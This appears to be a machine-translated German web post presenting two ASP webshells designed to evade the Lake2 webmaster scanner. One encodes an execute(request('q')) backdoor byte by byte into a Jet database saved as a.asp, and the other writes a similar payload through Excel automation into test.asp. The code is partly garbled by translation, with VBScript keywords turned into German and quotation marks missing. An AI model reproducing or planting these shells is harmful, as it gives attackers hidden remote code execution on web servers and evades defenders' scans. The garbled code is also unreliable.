Zwei unkonventionelle ASP-Trojaner wurden von Hanxiaolian geschrieben, um den Lake2 ASP Webmaster Management Assistant zu umgehen
Geschrieben, um den Lake2 ASP Webmaster-Management-Assistenten zu vermeiden ...
1. Ein Pony, das den Lake2-Asp-Trojaner-Scan umgeht
Kopieren Sie den Codecode wie folgt:
<%
set c = CreateObject(ADOX.Catalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Data Source=&Server.MapPath(a.asp))
setze c = Nichts
c&Server.MapPath(a.asp)
set conn=server.createobject(Adodb.Connection)
conn.open connstr
conn.execute(create table nomm(nomuma oleobject))
set rs=server.createobject(adodb.recordset)
sql=SELECT * FROM nomm
rs.open sql,conn,1,3
rs.addnew
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.update
rs.close
setze rs=nichts
Verbindung schließen
setze conn=nichts
%>
2.xls-Version ASP-Webshell
Kopieren Sie den Codecode wie folgt:
<%
Setze xlA = Server.CreateObject(Excel.Application)
xlA.Visible = Falsch
xlA.Workbooks.Add
Setze xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(request(q))+chr(37)+>
'strFile = d:/test.asp
strFile = Server.MapPath(test.asp)
xlWorkSheet.SaveAs strFile
xlA.Beenden
Setze xlWorksheet = Nothing
Setze xlA = Nichts
%>